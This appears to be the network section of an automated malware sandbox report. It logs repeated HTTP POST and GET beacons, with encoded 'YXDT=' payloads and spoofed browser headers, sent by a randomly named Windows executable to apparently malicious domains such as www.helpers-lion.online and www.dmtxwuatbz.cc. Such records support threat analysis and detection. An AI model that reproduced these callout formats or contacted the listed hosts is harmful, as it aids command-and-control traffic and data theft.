                    Data Ascii: e34Zmo_qdCKrtu-HI6+4hW`Can^@=\dq}=<oGh6WF[#J^QF%QT$AFK0NK=9PP}{(P`ds~n9MV995B[!"'rUskk)wp3}u<Utu_"PnFcW=0@u(I-^6ryY>C"L;XIzCB4L?%A*+7lC;pQ:V?~KYGoQ 7hgGRz}u1n,T@z#\-?8dXF0@0LfQ~f5i$<l$!;mc[Ek2SmN4pV+!J);G$R`x/~Em|'y|^%WpHmxax&<X;oo(Y]V0fu43V+uvc+CdbfX<buJF:?iyL[nw2UoxW[,~By3VEt%`Zlh"tS-@` ]G=\b(;XxfG4hm|'V,$tk(U#Dx%^i>s-ku2-P2!uZ<x/$)A-d8)k!d0kggU]UGXo1zwEm_G [TRUNCATED]
                    Aug 12, 2024 05:16:23.205149889 CEST1236INData Raw: c0 83 46 df d3 f6 e9 ac 13 f3 17 98 d6 35 06 f0 6a c7 6b b9 6a 23 32 b4 87 63 c2 28 f0 bd ee d3 8d 02 5a 06 dc 6d 8a 6a ff 02 7a 11 c2 a0 de c7 f1 3d e0 8c 47 98 62 db 59 ff d5 ca 09 47 6d 6d f2 5c 92 b6 0f de 1b 20 68 7a 0a e3 fe 19 a1 f0 7e f2
                    Data Ascii: F5jkj#2c(Zmjz=GbYGmm\ hz~%\qy)nT\@)9tJF@o|ZYj!;]har`$C/0N1(~$?<,CfRN>C+@?: 1AO!V?lX
                    Aug 12, 2024 05:16:23.205185890 CEST1236INData Raw: bb 78 2a ab 44 16 fc 4f a2 4f 66 3d 90 97 0e cb 22 4f 4f 53 8c 71 32 be 18 91 d9 06 9d d3 5a d0 1f 45 79 ca 0b 8a 89 2d 12 69 ce 12 38 53 2e 9c 5b a0 39 d2 64 b0 fa 23 30 e9 a7 1c fd b1 e1 65 b4 43 9e a3 22 fe 86 bb 01 d5 3a f5 00 89 d7 b0 89 ce
                    Data Ascii: x*DOOf="OOSq2ZEy-i8S.[9d#0eC":wO\3mb.@8>2D=8@39i#(O l:#48SNtVOdgOLWp62^="?*7YF>P8V
                    Aug 12, 2024 05:16:23.205220938 CEST114INData Raw: 89 de cb bd 0a 0b d9 aa 50 8b 23 87 4d 27 f4 03 2e e2 71 af 17 8d ec f9 59 14 e3 6c da 19 74 f5 db b6 b9 2b d9 a2 10 66 65 f2 e2 15 1c 1d 72 e3 59 a0 0f c7 c2 43 9f b3 b2 1d fa ee 28 52 2b 82 ae 4a ce 1a 67 f0 33 bc b2 52 12 d2 c5 43 29 72 04 9d
                    Data Ascii: P#M'.qYlt+ferYC(R+Jg3RC)rO&%Yp~ykFi)0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    34192.168.2.449773194.58.112.174802008C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe
                    TimestampBytes transferredDirectionData
                    Aug 12, 2024 05:16:25.058386087 CEST809OUTPOST /mooq/ HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                    Accept-Language: en-us
                    Accept-Encoding: gzip, deflate, br
                    Host: www.helpers-lion.online
                    Origin: http://www.helpers-lion.online
                    Cache-Control: max-age=0
                    Connection: close
                    Content-Type: application/x-www-form-urlencoded
                    Content-Length: 221
                    Referer: http://www.helpers-lion.online/mooq/
                    User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                    Data Raw: 59 58 44 54 3d 33 41 52 4a 70 41 4f 43 46 54 64 57 33 79 4a 38 31 72 44 4b 46 49 51 59 79 45 2f 52 53 42 6a 38 57 79 75 69 30 70 2f 46 46 48 72 4c 66 33 4b 68 49 6e 76 4e 37 41 56 6d 68 79 62 34 44 36 33 59 72 48 41 5a 51 6a 51 45 44 76 66 36 48 51 34 34 31 6c 6b 6b 6d 64 63 68 58 47 45 6f 33 58 56 71 68 43 75 77 46 6d 2f 7a 68 45 4a 45 54 50 41 4a 47 47 61 34 51 63 58 6f 67 4e 7a 44 68 67 6d 68 4f 45 64 75 49 37 36 2b 7a 54 64 61 74 4d 52 4f 37 37 4b 44 78 68 30 4e 6d 67 36 50 4e 41 4c 45 45 46 32 32 42 59 43 57 59 62 4c 75 73 74 4a 34 59 6b 67 36 4a 61 70 6a 79 69 69 44 42 42 56 4a 33 59 61 64 73 76 59 48 30 39 2f 70 57 5a 76 66 51 6c 4d 7a 72 75 6b 3d
                    Data Ascii: YXDT=3ARJpAOCFTdW3yJ81rDKFIQYyE/RSBj8Wyui0p/FFHrLf3KhInvN7AVmhyb4D63YrHAZQjQEDvf6HQ441lkkmdchXGEo3XVqhCuwFm/zhEJETPAJGGa4QcXogNzDhgmhOEduI76+zTdatMRO77KDxh0Nmg6PNALEEF22BYCWYbLustJ4Ykg6JapjyiiDBBVJ3YadsvYH09/pWZvfQlMzruk=
                    Aug 12, 2024 05:16:25.748203039 CEST1236INHTTP/1.1 404 Not Found
                    Server: nginx
                    Date: Mon, 12 Aug 2024 03:16:25 GMT
                    Content-Type: text/html
                    Transfer-Encoding: chunked
                    Connection: close
                    Content-Encoding: gzip
                    Data Raw: 65 33 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb ec 29 77 a8 82 d0 70 1d df 33 7d cf 75 3c 55 b7 74 75 1d 5f fa 22 50 6e a3 14 46 63 57 85 3d a5 30 d3 40 75 1c d9 28 49 d7 2d 89 5e a0 36 72 79 59 3e 43 8e 22 df b4 c3 10 b3 4c fa 3b 58 49 d6 7a 43 42 34 4c 86 3f ab cb 25 41 2a 84 c6 06 b2 ab ac 2b 06 37 6c d6 43 3b 70 86 51 d3 3a 56 3f ba [TRUNCATED]
                    Data Ascii: e34Zmo_qdCKrtu-HI6+4hW`Can^@=\dq}=<oGh6WF[#J^QF%QT$AFK0NK=9PP}{(P`ds~n9MV995B[!"'rUskk)wp3}u<Utu_"PnFcW=0@u(I-^6ryY>C"L;XIzCB4L?%A*+7lC;pQ:V?~KYGoQ 7hgGRz}u1n,T@z#\-?8dXF0@0LfQ~f5i$<l$!;mc[Ek2SmN4pV+!J);G$R`x/~Em|'y|^%WpHmxax&<X;oo(Y]V0fu43V+uvc+CdbfX<buJF:?iyL[nw2UoxW[,~By3VEt%`Zlh"tS-@` ]G=\b(;XxfG4hm|'V,$tk(U#Dx%^i>s-ku2-P2!uZ<x/$)A-d8)k!d0kggU]UGXo1zwEm_G [TRUNCATED]
                    Aug 12, 2024 05:16:25.748261929 CEST1236INData Raw: c0 83 46 df d3 f6 e9 ac 13 f3 17 98 d6 35 06 f0 6a c7 6b b9 6a 23 32 b4 87 63 c2 28 f0 bd ee d3 8d 02 5a 06 dc 6d 8a 6a ff 02 7a 11 c2 a0 de c7 f1 3d e0 8c 47 98 62 db 59 ff d5 ca 09 47 6d 6d f2 5c 92 b6 0f de 1b 20 68 7a 0a e3 fe 19 a1 f0 7e f2
                    Data Ascii: F5jkj#2c(Zmjz=GbYGmm\ hz~%\qy)nT\@)9tJF@o|ZYj!;]har`$C/0N1(~$?<,CfRN>C+@?: 1AO!V?lX
                    Aug 12, 2024 05:16:25.748301029 CEST1236INData Raw: bb 78 2a ab 44 16 fc 4f a2 4f 66 3d 90 97 0e cb 22 4f 4f 53 8c 71 32 be 18 91 d9 06 9d d3 5a d0 1f 45 79 ca 0b 8a 89 2d 12 69 ce 12 38 53 2e 9c 5b a0 39 d2 64 b0 fa 23 30 e9 a7 1c fd b1 e1 65 b4 43 9e a3 22 fe 86 bb 01 d5 3a f5 00 89 d7 b0 89 ce
                    Data Ascii: x*DOOf="OOSq2ZEy-i8S.[9d#0eC":wO\3mb.@8>2D=8@39i#(O l:#48SNtVOdgOLWp62^="?*7YF>P8V
                    Aug 12, 2024 05:16:25.748332977 CEST114INData Raw: 89 de cb bd 0a 0b d9 aa 50 8b 23 87 4d 27 f4 03 2e e2 71 af 17 8d ec f9 59 14 e3 6c da 19 74 f5 db b6 b9 2b d9 a2 10 66 65 f2 e2 15 1c 1d 72 e3 59 a0 0f c7 c2 43 9f b3 b2 1d fa ee 28 52 2b 82 ae 4a ce 1a 67 f0 33 bc b2 52 12 d2 c5 43 29 72 04 9d
                    Data Ascii: P#M'.qYlt+ferYC(R+Jg3RC)rO&%Yp~ykFi)0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    35192.168.2.449774194.58.112.174802008C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe
                    TimestampBytes transferredDirectionData
                    Aug 12, 2024 05:16:27.594923019 CEST10891OUTPOST /mooq/ HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                    Accept-Language: en-us
                    Accept-Encoding: gzip, deflate, br
                    Host: www.helpers-lion.online
                    Origin: http://www.helpers-lion.online
                    Cache-Control: max-age=0
                    Connection: close
                    Content-Type: application/x-www-form-urlencoded
                    Content-Length: 10301
                    Referer: http://www.helpers-lion.online/mooq/
                    User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                    Data Raw: 59 58 44 54 3d 33 41 52 4a 70 41 4f 43 46 54 64 57 33 79 4a 38 31 72 44 4b 46 49 51 59 79 45 2f 52 53 42 6a 38 57 79 75 69 30 70 2f 46 46 48 7a 4c 66 45 79 68 48 6b 48 4e 36 41 56 6d 6f 53 62 35 44 36 32 43 72 48 6f 64 51 6a 4d 2b 44 74 58 36 47 79 77 34 6b 30 6b 6b 73 64 63 68 62 6d 45 6c 35 33 56 2f 68 43 2b 30 46 6d 50 7a 68 45 4a 45 54 4e 59 4a 53 48 61 34 57 63 58 33 6e 4e 7a 78 6c 67 6d 46 4f 45 46 59 49 37 32 45 7a 6a 39 61 75 73 42 4f 2b 4a 79 44 75 52 30 50 32 77 36 74 4e 41 50 62 45 46 36 4c 42 64 2f 42 59 59 58 75 75 34 6b 5a 49 6c 55 46 66 61 31 45 74 7a 4f 34 50 32 67 4b 76 4c 47 6e 6c 4f 45 65 67 50 71 62 62 4a 44 58 56 45 73 76 36 37 54 38 45 5a 48 61 38 52 78 57 54 5a 30 4d 36 67 50 4e 45 6e 5a 5a 52 4d 45 63 4c 4a 6c 4c 79 57 68 6c 35 6b 62 31 6d 35 42 67 67 4f 68 2b 6e 71 44 52 67 6e 44 4d 4f 57 77 57 33 72 67 41 72 78 38 54 72 49 51 35 34 56 61 45 6f 67 45 4a 56 37 66 75 58 41 77 56 47 45 44 4e 6a 37 37 30 69 4c 48 72 57 72 7a 4d 76 78 37 46 32 73 54 6d 6f 33 2b 79 4e 55 41 54 76 [TRUNCATED]
                    Data Ascii: YXDT=3ARJpAOCFTdW3yJ81rDKFIQYyE/RSBj8Wyui0p/FFHzLfEyhHkHN6AVmoSb5D62CrHodQjM+DtX6Gyw4k0kksdchbmEl53V/hC+0FmPzhEJETNYJSHa4WcX3nNzxlgmFOEFYI72Ezj9ausBO+JyDuR0P2w6tNAPbEF6LBd/BYYXuu4kZIlUFfa1EtzO4P2gKvLGnlOEegPqbbJDXVEsv67T8EZHa8RxWTZ0M6gPNEnZZRMEcLJlLyWhl5kb1m5BggOh+nqDRgnDMOWwW3rgArx8TrIQ54VaEogEJV7fuXAwVGEDNj770iLHrWrzMvx7F2sTmo3+yNUATviEhgvnNriT0tnQzrKqGJVSK1vedybNrCO5Yqmb4xa5ieNH6e0pBMHgK7ZIdiPd19QDQamaAWcbt86V1iiO9IeO7dRuvOlCZCMwOFFqKshx9NW6gWPWM5zo6mA4gwsP0riFJItYGJrMjDvVmY6cGm8FFOm5bQlHQvP334W5EsubhZbyWNHOKfFo+iDp0y0zxw4t5pJIYmo+Rz7i+jdS2wvAJyGRdQDXfsmZAX1kmw0/VO3HUatCJr6qv6p9Acfd7mN05qlTSIP05VVCx7XL3rBWF+4f1dUnj74gDkT28vrnrBcgng+YAtRIhjKcMH6amnKcL8+7sKGH9QXsnVxjTqGHcdNeZcmfQCqBP5q0DbvGshKi038c9MKPDAALXGT2kCJ9twv2vPtszCobcDF9clzOU7YQX4hdJ/c1Z4PzzEmasHe9wdmL+Gf3u9Nd1VV535k4SChkSXLMRUXXGTiLmPCU7ZqUmuXBIdbpWEDDFbcFezHkrn8N+O0lqhms4bBtmiY7EdVQydSTmg9faGLB0HT2o0N28dKhObFd0MO0G0XGpBC4dgc3aD3fRuqMkOGAXo2xKsgKzGc7Nqk8KqO/N1CM/1me+7JlMKBQTOL9ID2PNMi6QJ/ahuLii3FsQl8gGj+NwDBllmFmBz35Z/f9xD1m29H0eAWExwCB [TRUNCATED]
                    Aug 12, 2024 05:16:28.296330929 CEST1236INHTTP/1.1 404 Not Found
                    Server: nginx
                    Date: Mon, 12 Aug 2024 03:16:28 GMT
                    Content-Type: text/html
                    Transfer-Encoding: chunked
                    Connection: close
                    Content-Encoding: gzip
                    Data Raw: 65 33 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb ec 29 77 a8 82 d0 70 1d df 33 7d cf 75 3c 55 b7 74 75 1d 5f fa 22 50 6e a3 14 46 63 57 85 3d a5 30 d3 40 75 1c d9 28 49 d7 2d 89 5e a0 36 72 79 59 3e 43 8e 22 df b4 c3 10 b3 4c fa 3b 58 49 d6 7a 43 42 34 4c 86 3f ab cb 25 41 2a 84 c6 06 b2 ab ac 2b 06 37 6c d6 43 3b 70 86 51 d3 3a 56 3f ba [TRUNCATED]
                    Data Ascii: e34Zmo_qdCKrtu-HI6+4hW`Can^@=\dq}=<oGh6WF[#J^QF%QT$AFK0NK=9PP}{(P`ds~n9MV995B[!"'rUskk)wp3}u<Utu_"PnFcW=0@u(I-^6ryY>C"L;XIzCB4L?%A*+7lC;pQ:V?~KYGoQ 7hgGRz}u1n,T@z#\-?8dXF0@0LfQ~f5i$<l$!;mc[Ek2SmN4pV+!J);G$R`x/~Em|'y|^%WpHmxax&<X;oo(Y]V0fu43V+uvc+CdbfX<buJF:?iyL[nw2UoxW[,~By3VEt%`Zlh"tS-@` ]G=\b(;XxfG4hm|'V,$tk(U#Dx%^i>s-ku2-P2!uZ<x/$)A-d8)k!d0kggU]UGXo1zwEm_G [TRUNCATED]
                    Aug 12, 2024 05:16:28.296379089 CEST224INData Raw: c0 83 46 df d3 f6 e9 ac 13 f3 17 98 d6 35 06 f0 6a c7 6b b9 6a 23 32 b4 87 63 c2 28 f0 bd ee d3 8d 02 5a 06 dc 6d 8a 6a ff 02 7a 11 c2 a0 de c7 f1 3d e0 8c 47 98 62 db 59 ff d5 ca 09 47 6d 6d f2 5c 92 b6 0f de 1b 20 68 7a 0a e3 fe 19 a1 f0 7e f2
                    Data Ascii: F5jkj#2c(Zmjz=GbYGmm\ hz~%\qy)nT\@)9tJF@o|ZYj!;]har`$C/0N1(~$?<,CfRN>C+@?: 1
                    Aug 12, 2024 05:16:28.296422005 CEST1236INData Raw: 41 0b fd 4f f2 21 56 b4 13 3f 80 6c bb 58 08 16 91 dc 16 94 e9 a4 05 c8 7d d8 31 d3 0a 8a a1 b4 e0 1d fc 7f 40 6b cc 82 2b 34 90 7c c2 5a 60 5f 86 96 e2 ef a0 16 b4 fd e1 d7 fb 6f cc 4d d6 60 30 1e b4 da 3f 25 9f a7 66 bd c7 d6 4c 97 c9 24 b4 13
                    Data Ascii: AO!V?lX}1@k+4|Z`_oM`0?%fL$?Br8!D(<a~agp#$!%@uyL:|dt4SW \-YNG."5ly4(6iF2<$
                    Aug 12, 2024 05:16:28.296458960 CEST1126INData Raw: f9 be 12 f7 14 b8 59 a8 8a e9 46 d4 3e 50 38 9a f3 56 a6 3a 5f 3f 32 f5 75 32 16 ee 39 5a 4e 67 ee 38 9b 32 10 74 33 10 e2 ea 15 77 e0 a3 01 2e a2 cc df 8d 54 30 5e 53 2e d8 df 0f ce b9 6e 45 94 65 59 54 a7 67 23 29 36 fc 00 f2 d2 18 0e fa 9f 58
                    Data Ascii: YF>P8V:_?2u29ZNg82t3w.T0^S.nEeYTg#)6Xtz(9~|I&]ysR^-WELo1[r\%rC5GTI?c}uSr46\`GL,vk"cWA`^F7i%}*ejW<P


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    36192.168.2.449775194.58.112.174802008C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe
                    TimestampBytes transferredDirectionData
                    Aug 12, 2024 05:16:30.138892889 CEST507OUTGET /mooq/?ZH3=yf1H3v6h&YXDT=6C5pq03gIUcCxycb2ojrc6UlpUueVjiCIQvh/K6jTje/eWOGI1u26kAEsQXtCs3elXAZegkYPdXqLAdc1WNGnvkmbDl/kRMbgDKTG3Ttr251X/MxPUe8WZ8= HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                    Accept-Language: en-us
                    Host: www.helpers-lion.online
                    Connection: close
                    User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                    Aug 12, 2024 05:16:30.835688114 CEST1236INHTTP/1.1 404 Not Found
                    Server: nginx
                    Date: Mon, 12 Aug 2024 03:16:30 GMT
                    Content-Type: text/html
                    Transfer-Encoding: chunked
                    Connection: close
                    Data Raw: 32 39 38 61 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 73 5f 61 64 61 70 74 69 76 65 22 20 6c 61 6e 67 3d 22 72 75 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 70 61 72 6b 69 6e 67 22 20 63 6f 6e 74 65 6e 74 3d 22 72 65 67 72 75 2d 72 64 61 70 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 77 77 77 2e 68 65 6c 70 65 72 73 2d 6c 69 6f 6e 2e 6f 6e 6c 69 6e 65 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 70 61 72 6b 69 6e 67 2d 72 64 61 70 2d 61 75 74 6f 2e 63 73 73 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 3f 31 22 20 74 79 70 65 [TRUNCATED]
                    Data Ascii: 298a<!doctype html><html class="is_adaptive" lang="ru"><head><meta charset="UTF-8"><meta name="parking" content="regru-rdap"><meta name="viewport" content="width=device-width,initial-scale=1"><title>www.helpers-lion.online</title><link rel="stylesheet" media="all" href="parking-rdap-auto.css"><link rel="icon" href="favicon.ico?1" type="image/x-icon"><script>/*<![CDATA[*/window.trackScriptLoad = function(){};/*...*/</script><script onload="window.trackScriptLoad('/manifest.js')" onerror="window.trackScriptLoad('/manifest.js', 1)" src="/manifest.js" charset="utf-8"></script><script onload="window.trackScriptLoad('/head-scripts.js')" onerror="window.trackScriptLoad('/head-scripts.js', 1)" src="/head-scripts.js" charset="utf-8"></script></head><body class="b-page b-page_type_parking b-parking b-parking_bg_light"><header class="b-parking__header b-parking__header_type_rdap"><div class="b-parking__header-note b-text"> &nbsp;<a class="b-link" href="https://r [TRUNCATED]
                    Aug 12, 2024 05:16:30.835733891 CEST1236INData Raw: 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 67 65 5f 5f 63 6f 6e 74 65 6e 74 2d 77 72 61 70 70 65 72 20 62 2d 70 61 67 65 5f 5f 63 6f 6e 74 65 6e 74 2d 77 72 61 70 70 65 72 5f 73 74 79 6c 65 5f 69 6e 64 65 6e 74 20 62 2d 70 61
                    Data Ascii: /div><div class="b-page__content-wrapper b-page__content-wrapper_style_indent b-page__content-wrapper_type_hosting-static"><div class="b-parking__header-content"><h1 class="b-parking__header-title">www.helpers-lion.online</h1><p class="b-parki
                    Aug 12, 2024 05:16:30.835767031 CEST1236INData Raw: 69 74 6c 65 22 3e d0 94 d1 80 d1 83 d0 b3 d0 b8 d0 b5 20 d1 83 d1 81 d0 bb d1 83 d0 b3 d0 b8 20 d0 a0 d0 b5 d0 b3 2e d1 80 d1 83 3c 2f 68 32 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 70 72 6f 6d 6f 22 3e 3c 64 69 76
                    Data Ascii: itle"> .</h2><div class="b-parking__promo"><div class="b-parking__promo-item b-parking__promo-item_type_hosting-overall"><div class="b-parking__promo-header"><span class="b-parking__promo-image b-parking__pro
                    Aug 12, 2024 05:16:30.835798025 CEST1236INData Raw: d1 80 d0 b8 d0 be d0 b4 2e 3c 2f 70 3e 3c 2f 6c 69 3e 3c 2f 75 6c 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 62 75 74 74 6f 6e 2d 77 72 61 70 70 65 72 22 3e 3c 61 20 63 6c 61 73 73 3d 22 62 2d 62 75 74 74 6f 6e 20 62
                    Data Ascii: .</p></li></ul><div class="b-parking__button-wrapper"><a class="b-button b-button_color_primary b-button_style_wide b-button_size_medium-compact b-button_text-size_normal b-parking__button b-parking__button_type_hosting" href="https://
                    Aug 12, 2024 05:16:30.835832119 CEST1236INData Raw: 2d 6c 69 6f 6e 2e 6f 6e 6c 69 6e 65 26 75 74 6d 5f 6d 65 64 69 75 6d 3d 70 61 72 6b 69 6e 67 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 73 5f 6c 61 6e 64 5f 73 65 72 76 65 72 26 61 6d 70 3b 72 65 67 5f 73 6f 75 72 63 65 3d 70 61 72 6b 69 6e 67 5f
                    Data Ascii: -lion.online&utm_medium=parking&utm_campaign=s_land_server&amp;reg_source=parking_auto"></a></div><div class="b-parking__promo-item b-parking__promo-item_type_cms"><strong class="b-title b-title_size_large-compact">
                    Aug 12, 2024 05:16:30.835865021 CEST1236INData Raw: 26 6e 62 73 70 3b d0 bd d0 b5 d1 81 d0 ba d0 be d0 bb d1 8c d0 ba d0 be 20 d0 bc d0 b8 d0 bd d1 83 d1 82 2e 3c 2f 70 3e 3c 61 20 63 6c 61 73 73 3d 22 62 2d 62 75 74 74 6f 6e 20 62 2d 62 75 74 74 6f 6e 5f 63 6f 6c 6f 72 5f 72 65 66 65 72 65 6e 63
                    Data Ascii: &nbsp; .</p><a class="b-button b-button_color_reference b-button_style_block b-button_size_medium-compact b-button_text-size_normal" href="https://www.reg.ru/web-sites/website-builder/?utm_source=www.helpers-lion.on
                    Aug 12, 2024 05:16:30.835899115 CEST1236INData Raw: 53 53 4c 2d d1 81 d0 b5 d1 80 d1 82 d0 b8 d1 84 d0 b8 d0 ba d0 b0 d1 82 20 d0 b8 26 6e 62 73 70 3b d0 be d0 b1 d0 b5 d0 b7 d0 be d0 bf d0 b0 d1 81 d1 8c d1 82 d0 b5 20 d0 b2 d0 b0 d1 88 20 d0 bf d1 80 d0 be d0 b5 d0 ba d1 82 20 d0 be d1 82 26 6e
                    Data Ascii: SSL- &nbsp; &nbsp;! , &nbsp; &nbsp;
                    Aug 12, 2024 05:16:30.835930109 CEST1236INData Raw: 42 79 54 61 67 4e 61 6d 65 28 27 68 65 61 64 27 29 5b 30 5d 3b 0a 20 20 20 20 20 20 20 20 73 63 72 69 70 74 2e 73 72 63 20 3d 20 27 68 74 74 70 73 3a 2f 2f 70 61 72 6b 69 6e 67 2e 72 65 67 2e 72 75 2f 73 63 72 69 70 74 2f 67 65 74 5f 64 6f 6d 61
                    Data Ascii: ByTagName('head')[0]; script.src = 'https://parking.reg.ru/script/get_domain_data?domain_name=www.helpers-lion.online&rand=' + Math.random() + '&callback=ondata'; script.async = 1; head.appendChild( script );</script><s
                    Aug 12, 2024 05:16:30.835964918 CEST909INData Raw: 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 2f 67 74 61 67 2f 6a 73 3f 69 64 3d 55 41 2d 33 33 38 30 39 30 39 2d 32 35 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 77 69 6e
                    Data Ascii: c="https://www.googletagmanager.com/gtag/js?id=UA-3380909-25"></script><script>window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', 'UA-3380909-25');</script


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    37192.168.2.449776104.21.45.56802008C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe
                    TimestampBytes transferredDirectionData
                    Aug 12, 2024 05:16:35.878890038 CEST771OUTPOST /lfkn/ HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                    Accept-Language: en-us
                    Accept-Encoding: gzip, deflate, br
                    Host: www.dmtxwuatbz.cc
                    Origin: http://www.dmtxwuatbz.cc
                    Cache-Control: max-age=0
                    Connection: close
                    Content-Type: application/x-www-form-urlencoded
                    Content-Length: 201
                    Referer: http://www.dmtxwuatbz.cc/lfkn/
                    User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                    Data Raw: 59 58 44 54 3d 74 73 66 38 46 4e 69 49 70 4c 75 47 4a 48 55 48 78 52 38 59 45 36 38 77 4a 39 6f 58 65 47 77 6b 44 6e 52 69 4f 31 63 73 42 36 62 39 77 30 77 32 4e 35 37 46 30 41 63 67 51 67 52 6d 34 48 70 41 58 39 31 65 61 76 6d 4c 6c 2f 2b 50 42 66 75 45 39 51 5a 77 35 6a 43 42 32 76 7a 5a 30 6e 33 69 67 2f 79 66 76 61 43 37 4d 63 41 51 2b 7a 61 4e 4c 46 30 57 47 43 32 75 65 5a 44 76 58 77 71 6b 46 61 44 58 77 54 49 6b 4e 57 58 77 50 4d 35 48 6e 78 67 45 50 6c 44 2f 30 51 6a 74 72 35 34 79 44 7a 51 6a 6d 74 6d 37 50 4f 64 61 34 4f 77 70 6f 47 51 67 33 59 65 2f 37 2f 66 7a 54 32 5a 31 41 51 3d 3d
